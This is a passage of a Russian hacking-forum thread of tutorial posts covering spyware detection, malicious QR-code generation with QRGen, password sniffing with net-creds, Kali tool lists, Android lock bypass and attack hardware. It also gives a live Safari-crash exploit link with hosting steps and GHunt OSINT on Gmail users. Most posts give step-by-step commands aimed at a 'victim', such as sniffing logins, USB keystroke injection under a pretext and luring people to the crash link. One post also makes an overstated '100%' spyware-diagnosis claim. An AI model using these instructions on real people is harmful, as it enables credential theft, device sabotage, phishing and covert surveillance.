На ряду с развитием кибербезопасности, совершенствуются и хакерские инструменты, в том числе шпионские приложения. Обнаружить их становится все труднее и труднее. Многие из них позиционируют себя как инструменты родительского контроля, тем не менее, они широко используются для взлома и других незаконных действий. А что если ваше устройство подверглось атаке, и прямо сейчас за вами наблюдают? Обнаружить шпионское ПО довольно просто, если знать где искать и на что обращать внимание. Инструменты для слежки представляют собой реальную угрозу конфиденциальности и безопасности. Поэтому мы решили сделать специальное руководство, чтобы вы знали, как действовать в подобной ситуации.
Как обнаружить шпионское ПО на вашем устройстве
https://i.gyazo.com/ecaf33bfdd42e54b46aa296bf8c563fb.jpg
Проверьте передачу сотовых данных
Как только хакер получит удаленный доступ к вашему телефону, устройство начнёт потреблять больше данных, что приведет к высокому использованию Интернета. Это легко проверить в настройках в разделе «сотовая связь». Первое на что стоит обратить внимание, нет ли чрезмерной передачи данных за последний период.
https://i.gyazo.com/75a8a0927a593822e7f738063ff59292.jpg
Странные уведомления и звуки
Если вы вдруг получили подозрительное уведомление от неизвестного приложения, которое вы не устанавливали, то можете быть уверены, что на вашем устройстве установлено какое-то шпионское приложение.
Помимо этого, всплывающая реклама в пуш уведомлениях и странные звуки — это все признаки шпионского или вредоносного ПО.
https://i.gyazo.com/97670d987568d79119aaccee8ef10d03.jpg
Перегрев телефона и быстрый расход батареи
Батарея разряжается намного быстрее, чем раньше? Ваш телефон нагревается, даже когда вы им не пользуетесь? Приложения открываются все медленнее? Причиной тому может быть шпионское приложение, работающее в фоновом режиме.
https://i.gyazo.com/4da1b2d1f58fd5024c7d8e594d228254.jpg
Странные сообщения
Если вы стали получать сообщения в закодированном формате из неизвестных источников, возможно, эти сообщения являются командами, контролирующими ваше устройство. Многие шпионские программы работают по такому принципу, поэтому, их наличие должно вас насторожить.
https://i.gyazo.com/33fdb909c3b884933309e0b4cda10364.jpg
Наличие скрытых папок
Используйте приложение для просмотра файлов и проверьте внутреннюю память. Включите опцию скрытых файлов. Шпионское приложение обычно создает файлы со словами «невидимка», «шпион» и «мобильный шпион» в именах, которые могут служить доказательствами.
Проверьте неизвестные приложения
Откройте раздел всех приложений на вашем Android, чтобы узнать, установлены ли на устройстве какие-либо неизвестные приложения. Если вы обнаружите там раннее неизвестное вам приложение, то можете быть уверены, что устройство было скомпрометировано, и вам необходимо удалить приложение как можно скорее.
https://i.gyazo.com/9b53bf1cc08761414dda3a98162373d3.jpg
При обнаружении 2 и более пунктов, можно со 100% вероятностью сделать заключение, что за вашим телефоном ведётся слежка. Выполнив, ниже описанные шаги, вы сможете устранить помеху и тщательно очистить ваше устройство от вредоносных программ.
Как очистить свое устройство от шпионского ПО
Устанавливайте приложения только из плеймаркета. Благодаря этому ваш телефон станет намного безопаснее и надежнее.
Установите антивирус. Это повысит безопасность вашего телефона, а также поможет обнаружить и устранить шпионское ПО.
Если вы используете iPhone, и ваше устройство было взломано, то обновите его до более новой версии или вовсе переустановите ios.
Для установки шпионских приложений требуется либо физический доступ, либо невнимательность пользователя. Обязательно установите хороший пароль для вашего устройства, который не так-то просто взломать. Убедитесь, что вы не переходите по неизвестным ссылкам и не загружаете приложения из браузера.
Проведите чистку приложений с вашего устройства. Удалите все неизвестные приложения или те, которыми вы не пользуетесь.
И последнее, но не менее важное: перезагрузите устройство, если вы не можете удалить вирус или обнаружить шпионское ПО. Если ничего из вышеназванного не помогло, то попробуйте сделать резервную копию всех файлов, предварительно просканировав их антивирусом. Не создавайте резервные копии приложений. Сохраните только самое важное, а затем сбросьте устройство до заводских установок. Этот способ всегда работает.
А на этом все. Удачи!
BlackMAST
08.12.2022, 12:44
https://i.gyazo.com/55832d5db4c558d972b56cd5f8da9080.jpg
Вступить в наш чат
QR-коды используются во всем мире, начиная от хранения данных и заканчивая отправкой и получением платежной информации. Но так ли они безопасны, как все утверждают? Могут ли быть вредоносные QR-коды? И возможен ли взлом QR-кодов? Что ж, правда в том, что QR-коды могут легко могут ввести человека в заблуждение и оказаться фальшивкой. В отличие от вредоносных программ и фишинговых ссылок, вредоносные QR-коды неразличимы невооруженным глазом. Любой пользователь самостоятельно может создать любой QR-код, начинённый вредоносным ПО. Мы покажем вам, как именно взломать устройства с помощью QR-кодов.
https://i.gyazo.com/fb0f867d64c8efc758ef801cf6133c4e.jpg
Дисклеймер: Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.
Что такое QR-код?
QR (от английского Quick Response, «быстрый отклик») — это штрих-код, который легко считывается цифровым устройством и хранит информацию в виде серии пикселей в квадратной сетке. При сканировании QR-кода пользователь тотчас получает доступ к этим данным.
До появления QR-кодов использовались линейные штрих-коды, в которых данные хранились в строках. Затем с годами QR-коды становились все сложнее и сложнее.
https://i.gyazo.com/ea09b76164102e2be402671af205e434.jpg
Код первого поколения
https://i.gyazo.com/ac112d81ef0b0538884a0e26532893bc.jpg
Второе поколение
Как видно из изображений, сложность QR-кодов увеличилась, как и количество данных, которые они могут содержать. Сейчас один QR-код может содержать до 4296 символов ASCII. Хотя это может показаться не таким уж большим количеством, но этого зачастую предостаточно для хранения важной информации.
Поскольку нельзя на первый взгляд отличить вредоносный QR-код от обычного, пользователям становится все сложнее защититься от вирусов и взломов. Не говоря уже о том, что для QR-кодов нет антивирусных программ.
Итак, приступим к взлому Qr-кодов.
Мы будем проверять два разных типа атак:
Взлом с помощью QR GEN;
Создание вредоносных QR-кодов с помощью QRGEN.
Хакинг с помощью QR-кодов
Инструмент для взлома, который мы будем использовать сегодня, называется QR GEN. Это инструмент Python, который может помочь нам создавать вредоносные QR-коды. У него также есть много готовых эксплойтов, которые мы можем использовать в своих интересах.
Python по умолчанию установлен в Linux. Если вы используете другую ОС, вам придется установить Python.
Шаг 1: Клонирование инструмента
Клонируйте репозиторий Github с помощью следующей команды:
git clone https://github.com/h0nus/QRGen
Шаг 2: Теперь введите следующие команды:
cd QRGen
ls
Шаг 3: Теперь установите все требования к программному обеспечению для этого инструмента:
pip3 install -r requirements.txt
Шаг 4: Если это не сработало, используйте эту альтернативную команду:
python3 -m pip install -r requirements.txt
Шаг 5: Теперь запустите скрипт, набрав:
python3 qrgen.py
https://i.gyazo.com/ca103b06a86c7c9852c8aab1b0e9e95a.jpg
Как видите, инструмент способен на многое.
Шаг 6: В QR GEN доступны следующие готовые эксплойты:
https://i.gyazo.com/b0e41b9cdf879af27c1c34d1e963407c.jpg
Шаг 7: Мы выберем один из них. Итак, вариант 2: Внедрение команд. Мы будем использовать следующую команду, чтобы выбрать свой вариант: python3 qrgen.py -l 2. После чего будет сгенерирована группа QR-кодов, которые будут сохранены в зеленой папке.
Введите следующие команды, чтобы перейти в каталог:
cd genqr
ls
https://i.gyazo.com/9383e360311d27406fc98b59272abe8a.jpg
Или просто откройте папку QR gen. Как вы видите, у каждого из этих кодов есть скрытая команда. Вы можете затестить их с помощью мобильного сканера. QR-код генерируется автоматически и имеет скрытую команду.
https://i.gyazo.com/4e232c6f189a86875e338c7c81140396.jpg
Но что делать, если вы хотите создать собственную начинку для QR-кода?
Секретный метод: создание пользовательского QR-кода
Шаг 1: Чтобы закодировать собственный QR-код, нам сначала нужно создать текстовый файл в папке QRGen:
cd QRGen
nano exploit.txt
Шаг 2: В этот текстовый файл мы можем поместить любую начинку, в том числе фишинговый URL. Для наглядности мы будем использовать фейсбук.
www.facebook.com
https://i.gyazo.com/27c27b913db941a6f5a5f2db51582c02.jpg
Шаг 3: Мы можем сохранить файл, нажав Control X, и затем Y и Enter, чтобы подтвердить сохранение. Теперь вы можете увидеть текстовый файл. Введите ls для подтверждения:
ls
Шаг 4: Чтобы записать информацию в QR-код, нам нужно ввести следующее:
cd
python3 qrgen.py -w '/username/QRGen/genqr/exploit.txt'
Кроме того, файл txt должен находиться в каталоге QRGen.
https://i.gyazo.com/4a33f367216ad39fcf71c17430963867.jpg
Шаг 5: Для нашего URL-адреса facebook.com, инструмент сгенерировал приведенный ниже QR-код. Вы можете найти его в папке QRGen.
https://i.gyazo.com/2a33baaa4092722161f139b687ef887c.jpg
Поздравляем! Ваш персональный QR-код готов.
Заключение
Сканирование QR-кодов без знания того, что они в себе скрывают, может привести к катастрофе. Эти вредоносные QR-коды могут заставить пользователя посетить фишинговые страницы, загрузить вирусы и подорвать безопасность любого пользователя. Многие приложения для сканирования напрямую открывают коды, не проверяя их содержимое. А некоторые даже выполняют команды. Так что впредь с осторожностью относитесь к любым сомнительным QR-кодам. В следующий раз, когда будете их сканировать, задайтесь вопросом: «Безопасно ли это?». И если вы сомневаетесь, то оставьте эту затею.
BlackMAST
12.12.2022, 12:47
https://i.gyazo.com/0189259c943f696ff78e84b6c041fb86.jpg
Вступить в наш чат
Если вы не слышали о сниффинге, то не беспокойтесь, сейчас мы вам все расскажем. Это не какой-то секретный хакерский инструмент, а обычная программа для перехвата паролей и хэшей на основе Python. В этом статье мы научим вас, как использовать Net Creds и запустить атаку в вашей локальной сети. Как вы можете догадаться, этот хак не работает через Интернет, а только локально, т.е. и вы, и потенциальная жертва должны быть в одной сети, чтобы этот взлом сработал.
Что такое сниффинг
Ранее мы уже подробно разбирали, что такое сниффинг, его виды и как защититься от него. Если вы не ознакомились с этой статей, то переходите по ссылке (https://forum.antichat.xyz/threads/750994/post-329637).
https://i.gyazo.com/f0d920943d0596167ec6151e6a814118.gif
Сниффинг — (от англ. sniff - нюхать) — это процесс мониторинга и кражи данных с помощью отслеживания сетевой активности и сбора персональной информации о пользователях. Изначально снифферы предназначались для использования сетевыми администраторами для устранения неполадок подозрительного трафика. Однако, в настоящее время хакеры используют снифферы для перехвата пакетов данных, содержащих конфиденциальную информацию, такую как пароли, логины и т. д.
Дисклеймер: Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.
Сниффим с помощью Net Creds
Поскольку в Kali Linux по умолчанию есть все необходимое для взлома, сам процесс сниффинга значительно упрощается.
Шаг 1: Клонируем инструмент для перехвата паролей
В Kali вы можете просто использовать следующую команду для загрузки Net Creds:
git clone https://github.com/DanMcInerney/net-creds
https://i.gyazo.com/d14557475c3b334dcb8c95071f1e3b15.jpg
Шаг 2: Запуск терминала Kali Linux
Измените каталог, написав в терминале:
cd net-creds
Чтобы начать сниффинг-атаку запустите сценарий net Creds с помощью следующей команды:
python net-creds.py -i eth0
Вам нужно выбрать правильный интерфейс, в нашем случае мы использовали -i eth0 в качестве своего интерфейса.
https://i.gyazo.com/8f64f1b791c617a9a502f2bb9b14914a.jpg
Шаг 3: Подождите, пока жертва войдет в систему
Когда жертва заходит на незащищенный веб-сайт, который отправляет пароли в виде простого текста, пароль будет перехвачен, и хакер легко взломает учетные записи.
На скриншоте показаны перехваченные данные в формате запроса GET и POST протокола HTTP. Анализируя этот трафик, мы можем легко увидеть простой текстовый пароль. Эта атака будет работать только с сайтами, имеющими HTTP-трафик.
Команды для Net Creds
Автоматическое определение интерфейса для сниффинга:
sudo python net-creds.py
Выберите eth0 в качестве интерфейса:
sudo python net-creds.py -i eth0
Игнорировать пакеты 192.168.0.2:
sudo python net-creds.py -f 192.168.0.2
Чтение из захваченного файла pcap:
python net-creds.py -p pcapfile
Возможности net-creds для перехвата паролей
Net Creds — это, действительно, мощный хакерский инструмент, потому что он может перехватывать протоколы непосредственно из сетевого интерфейса или из файла PCAP и раскрывать всю конфиденциальную информацию, передаваемую через Интернет.
Посещенные URL-адреса;
POST-загрузки, отправленные по сети;
Используемые логины/пароли HTTP;
Настройка логинов/паролей базовой аутентификации HTTP;
Логины/пароли FTP в текстовом виде;
Логины/пароли IRC в текстовом виде;
Логины/пароли POP в текстовом виде;
Перехваченные логины/пароли IMAP;
Логины/пароли Telnet;
Логины/пароли SMTP;
NTLMv1/v2 все поддерживаемые протоколы: HTTP, SMB, LDAP и т. д.
Kerberos.
Как предотвратить снифф-атаку
1. Первая защита от снифферов — это надежная реализация безопасности на уровне веб-сайта. Сайт должен иметь https-сертификат. Таким образом, трафик всегда шифруется, даже если злоумышленник получит данные, ему будет трудно их расшифровать.
2. Антисниффер и антивирус для обнаружения использования снифферов в вашей сети.
3. Регулярные обновления операционной системы и браузеров.
4. Использование только безопасных сайтов.
На этом все. Надеемся, что данная статья была полезной. Удачи!
BlackMAST
15.12.2022, 12:45
https://i.gyazo.com/92590228fb4512108ecc5beb61932aec.jpg
Вступить в наш чат
Kali Linux — это специально разработанная ОС для сетевых аналитиков, пентестеров или, проще говоря, для тех, кто работает в сфере кибербезопасности и анализа. Иногда нам приходится автоматизировать наши задачи при тестировании на проникновение или взломе, работать вручную — сложная и нецелесообразная задача, поэтому мы используем инструменты, которые поставляются в комплекте с Kali Linux. Эти инструменты не только экономят наше время, но и собирают точные данные и дают конкретный результат. Kali Linux поставляется с более чем 350 инструментами, разобраться и отсортировать самое необходимое — непосильная работа для новичка. В этой статье мы собрали для вас топ лучших инструментов Kali Linux, которые могут сэкономить вам много времени и усилий. Поехали!
https://i.gyazo.com/a9d5a73ee64e13a54e0c82c90d7a0ca3.jpg
1. Nmap
Nmap — это сетевой сканер с открытым исходным кодом, который используется для разведки/сканирования сетей. Он используется для обнаружения хостов, портов и служб вместе с их версиями в сети. Он отправляет пакеты на хост, а затем анализирует ответы, чтобы получить желаемые результаты. Его можно даже использовать для обнаружения хостов, обнаружения операционной системы или сканирования открытых портов. Это один из самых популярных разведывательных инструментов. Чтобы использовать nmap:
Пропингуйте хост с помощью команды ping, чтобы получить IP-адрес:
ping hostname
Откройте терминал и введите там следующую команду:
nmap -sV ipaddress
Замените IP-адрес на IP-адрес хоста, который вы будете сканировать.
Он будет отображать все захваченные данные хоста.
https://i.gyazo.com/1e1c846549537f8e8b5ad6c26ac5f3c8.png
https://i.gyazo.com/ec80f641a17bfb7f7051da159a63b865.png
2. Burp Suite
Burp Suite — одна из самых популярных программ для тестирования безопасности веб-приложений. Она используется как прокси, поэтому все запросы от браузера с прокси проходят через неё. И когда запрос проходит через пакет burp, он позволяет нам вносить изменения в эти запросы в соответствии с нашими потребностями, что хорошо для тестирования уязвимостей, таких как XSS или SQLi, или даже любой уязвимости, связанной с Интернетом. Kali Linux поставляется с версией burp suite, которая бесплатна, но есть и платная версия этого инструмента, известная как проф. версия, которая имеет гораздо больше функций. Чтобы использовать burp suite:
Откройте терминал и наберите там «burpsuite».
Перейдите на вкладку «Прокси» и включите режим перехватчика.
Теперь перейдите на любой URL-адрес, и можно будет увидеть, что запрос перехвачен.
https://i.gyazo.com/5e6af54fd75bb8b023c99d9b51a6e5c3.png
3. Wireshark
Wireshark — это инструмент сетевой безопасности, используемый для анализа или работы с данными, отправляемыми по сети. Он используется для анализа пакетов, передаваемых по сети. Эти пакеты могут содержать такую информацию, как IP-адрес источника и IP-адрес назначения, используемый протокол, и другие данные. Пакеты обычно имеют расширение «.pcap», которое можно прочитать с помощью инструмента Wireshark. Чтобы использовать Wireshark:
Откройте Wireshark и загрузите демо-файл pcap отсюда.
Нажмите «ctrl + o», чтобы открыть файл pcap в wireshark.
Теперь вы можете заметить, что он отображает список пакетов вместе с их заголовками.
https://i.gyazo.com/2eb54512dcbc210708cd040b6c7c4d79.png
4. Metasploit Framework
Metasploit — это инструмент с открытым исходным кодом, разработанный технологиями Rapid7. Это одна из наиболее часто используемых в мире сред тестирования на проникновение. Инструмент поставляется с множеством эксплойтов для использования уязвимостей в сети или операционных системах. Metasploit обычно работает в локальной сети, но мы можем использовать Metasploit для хостов через Интернет, используя «переадресацию портов». По сути, Metasploit — это инструмент на основе командной строки, но у него даже есть пакет с графическим интерфейсом под названием «armitage», который делает использование Metasploit ещё более удобным.
Metasploit предустановлен вместе с Kali Linux.
Просто введите «msfconsole» в терминале.
https://i.gyazo.com/8f902b49f61be903f016cdc988d964ca.png
5. Aircrack-ng
Aircrack — это комплексный анализатор пакетов, взломщик WEP и WPA/WPA2, инструмент анализа и захвата хэшей. Также он используется для взлома Wi-Fi. Он поддерживает практически все новейшие беспроводные интерфейсы. Чтобы использовать aircrack-ng:
aircrack-ng уже автоматически установлен с Kali Linux.
Просто введите aircrack-ng в терминале, чтобы использовать его.
https://i.gyazo.com/7fc38caeee15cc236677d40a4c95f59f.png
Заключение
Это далеко не все лучшие инструменты, доступные в Kali Linux. В следующей части мы продолжим освещать эту тему, дополнив нашу подборку. А на этом все, надеемся, что вы открыли для себя раннее неизвестные инструменты, которые могут пригодится вам в работе. Удачи в использовании и до новых встреч!
BlackMAST
19.12.2022, 12:53
https://i.gyazo.com/16c385b7f41cc3b6f1cfafdea45b04d6.jpg
Вступить в наш чат
Сегодня мы продолжим рассказывать про топ-10 лучших инструментов, которые значительно облегчат вашу работу с Kali. Если вы еще не ознакомились с нашей прошлой статьей, то переходите по ссылке (https://forum.antichat.xyz/threads/750994/post-331090).
А мы начинаем.
https://i.gyazo.com/a9d5a73ee64e13a54e0c82c90d7a0ca3.jpg
Netcat
Netcat — это сетевой инструмент, используемый для работы с портами и выполнения таких действий, как сканирование, прослушивание и перенаправление портов. Он даже используется для сетевой отладки или тестирования сетевого демона. Его принято считать швейцарским армейским ножом среди всех сетевых инструментов. Netcat можно также использовать для выполнения операций, связанных с TCP, UDP или UNIX, для открытия удаленных соединений и многого другого.
Netcat поставляется с Kali Linux, поэтому просто введите «nc» или «netcat» в терминале, чтобы его использовать.
Чтобы выполнить прослушивание порта, введите следующие команды в 2 разных терминалах:
nc -l -p 1234
nc 127.0.0.1 1234
https://i.gyazo.com/aaf008314253e0d962d1f21bb01a6fa0.gif
John the Ripper
John — отличный инструмент для взлома паролей с использованием известной брутфорс-атаки как по словарю, так и по пользовательскому списку слов. Помимо этого, инструмент используется для взлома хэшей и паролей для заархивированных и даже заблокированных файлов.
John the ripper предустановлен в Kali Linux. Просто введите «john» в терминале, чтобы использовать инструмент.
https://i.gyazo.com/39ad8a39a9ec34f2778177e664cf66cd.png
Sqlmap
Sqlmap — один из лучших инструментов для выполнения атак путем внедрения SQL. Он автоматизирует процесс тестирования параметра на SQL-инъекцию и процесс эксплуатации уязвимого параметра. Это отличный инструмент, поскольку он сам определяет базу данных, поэтому нам просто нужно предоставить URL-адрес, чтобы проверить, является ли параметр в URL-адресе уязвимым или нет, мы даже можем использовать запрошенный файл для проверки параметров POST.
sqlmap предустановлен в Kali Linux, поэтому просто введите sqlmap в терминале, чтобы начать им пользоваться.
https://i.gyazo.com/4787a7ec0b3fbc6142d81555fb899b39.png
Autopsy
Autopsy - это инструмент цифровой криминалистики, который используется для сбора информации или, другими словами, для исследования файлов или журналов, чтобы узнать, что именно было сделано с системой. Его можно даже использовать в качестве программного обеспечения для восстановления файлов с карты памяти или флешки.
Autopsy предустановлена в Kali Linux.
Просто введите «autopsy» в терминале.
https://i.gyazo.com/da3a30900c5a264929ad4ada6647db87.png
Теперь перейдите по ссылке, чтобы начать им пользоваться.
https://i.gyazo.com/a0d605d032361910f91099eefaaa54e1.png
Social Engineering Toolkit
Social Engineering Toolkit - это набор инструментов, которые можно использовать для выполнения атак социальной инженерии. Эти инструменты используют и манипулируют поведением человека для сбора информации. Идеально подойдёт для фишинга.
Social Engineering Toolkit предустановлен вместе с Kali Linux.
Просто введите «setoolkit» в терминале.
Согласитесь с условиями, чтобы начать использование.
https://i.gyazo.com/e86295311a13d36f683b0ce2c5cd6b47.png
Заключение
Kali Linux имеет в своём арсенале более 350 инструментов. Вам потребуется куча времени и сил, чтобы разобраться во всем этом многообразии, именно поэтому мы собрали для вас самые необходимые и действенные инструменты, которые обязательно автоматизируют и облегчат вашу работу. Надеемся, что данная подборка оказалась полезной для вас. А мы желаем вам удачи!
BlackMAST
22.12.2022, 12:42
https://i.gyazo.com/afadde9946f6e16f74452490667d3449.jpg
Вступить в наш чат
Вы хотите узнать, как хакеры взламывают андроиды или вы забыли свой пароль и не можете разблокировать телефон, тогда вы попали в нужное место. Мы подготовили подробный мануал из трёх способов, которые помогут вам разблокировать Android.
https://i.gyazo.com/955e2fa4a127425bc3876d338d640a85.png
Перед началом убедитесь, что вы сделали резервную копию всех данных вашего телефона:
1. Подключите ваше устройство к компьютеру;
2. Найдите свой телефон и откройте;
3. Скопируйте все папки, которые вы хотите сохранить на локальный диск.
Теперь мы готовы начать. Итак, поехали.
Метод №1 – Как разблокировать телефон с помощью пароля учетной записи Google
Что вам потребуется:
• Ваш Android;
• Доступ к аккаунту Google, который вы синхронизировали на этом устройстве.
Этот метод использует вашу собственную учетную запись Google Recovery для разблокировки телефона Android.
Примечание: Если у вас нет доступа к исходной учетной записи Google, вместо этого вы можете сразу перейти к методу №3.
А в этом способе все очевидно. Выбираем опцию «забыли пароль».
https://i.gyazo.com/3b3bfb9a0833bd1be281063fc0e2e618.jpg
Далее откроется скрытое меню, где вам нужно выбрать «Разблокировка учетной записи Google». И после ввести данные своей учетной записи Google.
Готово. Ваш телефон разблокирован. Теперь просто установить новый пароль.
Способ №2 – Как разблокировать устройство Samsung
Это специальный метод, предназначенный только для пользователей телефонов Samsung, который также используется хакерами для взлома телефонов.
Что понадобится:
• Устройство Samsung;
• Ваша учетная запись Samsung;
• Ноутбук или ПК.
Примечание: Этот метод работает только со смартфонами Samsung.
1. Откройте официальный веб-сайт Samsung на своем ПК и войдите в свою учетную запись Samsung.
https://i.gyazo.com/a449aa706e91015b2a36eb42632a4ee0.jpg
2. Выберите свое устройство Android на панели задач слева.
3. Найдите параметр «Разблокировать мой экран» на боковой панели и выберите его. Готово, ваше устройство будет разблокировано.
Метод №3 – Как разблокировать телефон с помощью обходных приложений
Приложение, которое мы будем использовать, называется dr. fone от Wondershare. Оно может обходить блокировки Android, PIN-коды, пароли и даже отпечатки пальцев без какой-либо потери данных.
Примечание: Этот метод работает не на всех устройствах андроид, поэтому лучше проверить веб-сайт разработчиков на наличие всех поддерживаемых устройств, чтобы увидеть, есть ли ваш телефон в этом списке.
1. Скачайте dr.fone с сайта разработчиков.
https://i.gyazo.com/393810767b88604bf3563752c0fbedb2.jpg
2. Запустите приложение на своем ПК и нажмите кнопку Разблокировать.
https://i.gyazo.com/ca8c3ba6102cebb4a68fd1e073b2ce18.jpg
3. Теперь подключите телефон Android к компьютеру с помощью USB-кабеля. После успешного подключения нажмите «Пуск».
https://i.gyazo.com/1d4a4f8db59ffd92d8857f6b6dffea75.jpg
4. Если ваш телефон успешно подключен, на экране должна появиться информация о нем. Если все верно, то нажмите «Далее».
5. Выберите режим восстановления, а затем загрузите пакет восстановления.
6. Как только это будет сделано, начнется процесс удаления пароля, и после его завершения на экране появится подтверждающее сообщение.
https://i.gyazo.com/73913a6666e73178b6d7d851bf39595a.jpg
Теперь перезагрузите телефон и пользуйтесь устройством.
На это все. Надеемся, что данная статья была полезной для вас. Удачи!
BlackMAST
26.12.2022, 12:59
https://i.gyazo.com/e9a4ee01c636dd12cf29a7d03e937da4.jpg
Вступить в наш чат
Существует огромное количество хакерских устройств, способных облегчить работу. Хорошему хакеру, как и настоящему рок-н-рольщику, необходимо все и сразу. Взлом — это процесс использования различных видов инструментов, и вы никогда не знаете, что вам может понадобиться следующим, поэтому нужное приспособление под рукой никогда не будет лишним. В этой статье мы поделимся 5 лучшими устройствами, которые должен взять на вооружение каждый начинающий хакер.
https://i.gyazo.com/c0cac6bdc89864d4676b769f25cea49c.jpg
1.Keystroke Injectors
https://i.gyazo.com/13a0b8a215baa5d57fbca7476328d3d5.jpg
Это устройство представляет собой простую флешку, которая при подключении к компьютеру определяется как клавиатура. В результате вы можете сделать следующее:
Загрузить и запустить вредоносное ПО из Интернета;
Выполнить системные команды;
Создать обратную оболочку;
Украсть пароли и другие данные.
Все зависит от того, как вы используете и управляете инжектором. Лучшее в этом устройстве то, что оно работает невидимо для ПК.
Итак, если вы хотите атаковать цель, просто возьмите это устройство и под видом флешки отдайте жертве. Вы можете придумать различные сценарии, при этом остаться незамеченным.
2.Hardware Keyloggers
https://i.gyazo.com/96d666829cc290eab58ddff162e94a14.jpg
Ещё одно, с виду неприметное, устройство, которое может стать настоящим хакерским оружием. Кейлоггер, при подключении к ПК, способен записывать каждое нажатие клавиши, которое жертва набирает на клавиатуре. Есть 2 вида таких устройств: у обычных аппаратных кейлоггеров есть внутреннее хранилище, тогда как профессиональная версия имеет облачную систему, которая будет хранить все нажатия клавиш, доступ к которым вы можете получить удалённо в любое время и в любом месте.
3. Wireless Adapter
https://i.gyazo.com/36873d10b292a0ddc06f2471c616f88f.jpg
Большинство компьютеров поставляются со встроенным беспроводным адаптером, но это не то же самое, что нужно нам для взлома. Вы не можете подключить их к виртуальным машинам, и большинство этих встроенных устройств не поддерживают внедрение пакетов, режим мониторинга или режим AP (режим точки доступа). Выбирать следует специальные Wi-Fi адаптеры для вардрайвинга(обнаружение и взлома точек Wi-Fi), которые поддерживаются Kali Linux. Такие адаптеры способны:
Собирать данные;
Перехватывать трафик;
Запускать свою собственную фальшивую сеть Wi-Fi или приманку.
Таким образом, эти беспроводные адаптеры способны на многое. Однако, важно отметить, что при покупке беспроводного адаптера не столько имеет значение бренд, как сами характеристики.
4. Android телефон с NetHunter
https://i.gyazo.com/66db09d0e3b1be29f0f54c9cfd43fd2a.jpg
NetHunter — это специальная Android версия, предназначенная для взлома. NetHunter поставляется с большим количеством полезных инструментов. Например, вы можете использовать его для запуска атак Keystroke Injection. Огромный плюс тандема андроид + NetHunter заключается в том, что для взлома ПК жертвы, вы можете просто сказать: «Мне нужно зарядить свой телефон, но я забыл зарядку». И в момент, когда жертва подключит ваш телефон к своему компьютеру, NetHunter может загрузить вредоносное ПО, украсть все сохраненные пароли, личные данные и многое другое, все будет зависеть от ваших целей. Кроме того, вы можете использовать NetHunter для выполнения атаки с подделкой DNS, MMIT (атака «человек посередине») и многого другого.
5. Raspberry Pi
https://i.gyazo.com/e8d03912130791adccc659c62f374b83.jpg
Это полноценный компьютер, но небольшого размера, Raspberry Pi 0 даже меньше кредитной карты. Все, что вы делаете на своем компьютере или ноутбуке, можно сделать здесь. Вы даже можете установить на него Kali Linux.
Он позволяет получить доступ к любой сети, просто подключите его к порту LAN, а после чего вы уже можете запускать любые инструменты, которые вы хотите: Nmap, Beef, Burp Suite, можно сниффить, изменять или красть данные. Его также можно использовать для запуска поддельных сетей Wi-Fi, приманок. С Raspberry Pi можно делать практически все.
Заключение
Количество хакерских атак растёт с каждым разом, как и сами способы, которое постоянно модернизируются и упрощаются. Так, любой пользователь с лёгкостью может стать жертвой злоумышленников, лишь подключив к своему компьютеру неизвестное USB-устройство или выбрав незащищенную Wi-Fi сеть. Поэтому всегда подумайте дважды, прежде чем предпринимать какие-либо шаги, ведь загнать себя в ловушку гораздо проще, чем вам кажется.
BlackMAST
29.12.2022, 12:42
https://i.gyazo.com/b1d8e0129300727dc99056c2cd45f86a.jpg
Вступить в наш чат
Компания Apple зарекомендовала себя как лучшую на всем рынке. Что касается безопасности устройств, iOS всегда занимали первую позицию по сравнению с Android. Но действительно ли macOS и iOS настолько безопасны, как утверждает Apple? Забавно, что существует множество эксплойтов, которые способны за считанные секунды вывести iPhone и MacOS из строя. Итак, сегодня мы собираемся показать, как работает один из таких эксплойтов. Так что, если вы все ещё думаете, что Apple спасёт ваше устройство от взлома, то вынуждены вас огорчить. Скоро сами в этом убедитесь.
https://i.gyazo.com/cfa76d9e60df74c07ebf9609eeb14631.jpg
Используем готовую ссылку
Чтобы крякнуть iPhone и MacOS, мы будем использовать Safari Reaper Tool. Это бесплатный инструмент, который использует эксплойт браузера Safari для сбоя устройства, что в дальнейшем приводит к перезагрузке системы, т.е. к сбою всего устройства.
Если вам лень настраивать инструмент, просто используйте ссылку ниже.
Осторожно: не проверяйте на своём устройстве! Если перейдете по ссылке ниже, то ваша система перезапустится и выйдет из строя!
На свой страх и риск:
Ссылка: https://jonnybanana.github.io/safari...per.github.io/
Самостоятельно настраиваем ссылку в Kali Linux
Если же вы хотите настроить ссылку в своей системе, сделайте следующее:
Шаг 1: Клонируйте репозиторий на свой Kali Linux
git clone https://github.com/JonnyBanana/safar...aper.github.io
Шаг 2: После загрузки репозитория откройте папку, и вы увидите файлы.
Шаг 3: Скопируйте эти файлы в папку «var/www/html/».
https://i.gyazo.com/47c34e897a7b1691287486b214621081.jpg
Шаг 4: Запустите сервер kali с помощью следующей команды:
service apache2 start
Шаг 5: Ссылка готова. Теперь, как только жертва перейдёт по ней, в устройстве произойдёт сбой.
На этом все. Удачи!
BlackMAST
02.01.2023, 13:00
https://i.gyazo.com/a64c945f89dc2d703ddb4fa44aafa02b.jpg
Вступить в наш чат
Термин «OSINT» или «разведка из открытых источников» означает поиск информации о цели. Существует множество методов, с помощью которых можно осуществить OSINT-разведку. В этой статье мы покажем, как просто и быстро извлечь много полезной информации о пользователе, зная лишь один адрес Gmail.
Многие люди используют почту Gmail, потому что она бесплатна и предоставляет бесплатное хранилище файлов на 15 ГБ. Однако, вы узнате, что получить доступ к информации Google проще простого, а поможет вам в этом инструмент под названием GHunt.
https://i.gyazo.com/e1c6cccb8d063079997b67b9a6d0c171.png
GHunt (v2) — это фреймворк Google, который в настоящее время ориентирован на OSINT.
Он имеет следующие особенности:
Использование CLI и модулей;
Использование библиотеки Python;
JSON-экспорт.
Вы можете установить GHunt на свой компьютер с Linux или в Google Cloud Console. Здесь же мы продемонстрируем вам, как установить его в Kali Linux.
Установка Ghunt:
Итак, во-первых, нам нужно установить Ghunt на нашу машину с Linux, но перед этим проверьте на наличие установщика Python 3. Откройте терминал и введите следующую команду для установки Ghunt:
git clone install https://github.com/mxrch/GHunt.git
После успешной установки нам теперь нужно запустить его. Заходим в каталог, где он установлен, с помощью команды «cd» (сменить каталог). В нашем случае команда следующая:
cd ghunt
